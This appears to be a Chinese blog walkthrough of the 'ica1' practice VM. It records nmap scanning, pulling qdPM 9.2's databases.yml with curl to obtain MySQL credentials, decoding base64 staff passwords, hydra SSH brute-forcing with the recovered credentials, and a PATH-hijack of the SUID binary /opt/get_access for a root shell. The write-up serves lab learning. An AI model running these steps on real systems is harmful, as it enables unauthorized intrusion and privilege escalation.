ica1靶机练习

使用vb打开虚拟机,选择桥接模式,kali也选择桥接

开机后会出现靶机ip,ip会时不时的变,命令不行,记得看一下ip是否变了

先扫描一下开放了哪些端口

nmap -p- 172.16.2.41

访问80后发现是个登录页面

是一个框架系统,版本为9.2

在kali中搜索看看这个框架有没有漏洞

要登录的话,我们查看第二个漏洞,密码相关

下载查看

翻译

我们到这个网址查看,下载文件

curl http://ip/core/config/databases.yml

给出了mysql的账号和密码,前面也看到开放的端口有3306,也就是mysql服务启动了

尝试进入数据库 正常登录会提示证书不符,后面加一句跳过

mysql -h 172.16.2.47 -u qdpmadmin -p --skip-ssl

在staff中,找到了用户名密码

密码是经过加密的,我们去base64解密

c3VSSkFkR3dMcDhkeTNyRg==

N1p3VjRxdGc0MmNtVVhHWA==

WDdNUWtQM1cyOWZld0hkQw==

REpjZVZ5OThXMjhZN3dMZw==

Y3FObkJXQ0J5UzJEdUpTeQ==

suRJAdGwLp8dy3rF

7ZwV4qtg42cmUXGX

X7MQkP3W29fewHdC

DJceVy98W28Y7wLg

cqNnBWCByS2DuJSy
Smith

ucas

Travis

Dexter

Meyer

使用hydry爆破一下,先写两个文件user和passwd作为字典

hydra -L user -P pass ssh://172.16.2.54

22\]\[ssh\] host: 172.16.2.54 login: travis password: DJceVy98W28Y7wLg \[22\]\[ssh\] host: 172.16.2.54 login: dexter password: 7ZwV4qtg42cmUXGX 登录一下 ssh travis@172.16.2.54 ![](https://i-blog.csdnimg.cn/direct/0126dd367bea4d0e9712e3d0aaa322c5.png) ssh dexter@172.16.2.54 ![](https://i-blog.csdnimg.cn/direct/9805d9a589244fe2a42f250447c8b773.png) ![](https://i-blog.csdnimg.cn/direct/f01384ebb98b4d19afaa4d80d1465bfd.png) 查看具有SetUID权限的可执行的文件 find / -perm -4000 2\>/dev/null ![](https://i-blog.csdnimg.cn/direct/93f567fa512c4016b1f177d8771e80ab.png) 使用strings命令查看一下get_access ![](https://i-blog.csdnimg.cn/direct/cf07c33d60644aa5bdb8b3fba755fd76.png) 发现cat命令提权 配置环境变量 echo "/bin/bash" \> /tmp/cat export PATH=/tmp:$PATH chmod +x /tmp/cat ehco $PATH /opt/get_access ![](https://i-blog.csdnimg.cn/direct/d8407678f1f4439093759d44c6f569b6.png) ![](https://i-blog.csdnimg.cn/direct/d0cbd1a6a0854310b6924c945b710532.png)

相关推荐
6v6-博客5 小时前
P2P 远程桌面工具|免费开源内网穿透远程软件
运维·服务器
deeper_wind5 小时前
k8s-容器化部署论坛和商城服务(小白的“升级打怪”成长之路)
linux·运维·容器·kubernetes
勇往直前plus5 小时前
VMware centos磁盘容量扩容教程
linux·运维·centos
qq_441996056 小时前
SSH 反向隧道:快速解决服务器网络限制
服务器·网络·ssh
政安晨6 小时前
Ubuntu 服务器无法 ping 通网站域名的问题解决备忘 ——通常与网络配置有关(DNS解析)
linux·运维·服务器·ubuntu·ping·esp32编译服务器·dns域名解析
007php0077 小时前
Jenkins+docker 微服务实现自动化部署安装和部署过程
运维·数据库·git·docker·微服务·自动化·jenkins
路溪非溪8 小时前
嵌入式Linux驱动开发杂项总结
linux·运维·驱动开发
2501_920047038 小时前
nginx-限速-限制并发连接数-限制请求数
运维·nginx
Neolock8 小时前
Linux应急响应一般思路(三)
linux·web安全·应急响应
RainbowJie18 小时前
Gemini CLI 与 MCP 服务器:释放本地工具的强大潜力
java·服务器·spring boot·后端·python·单元测试·maven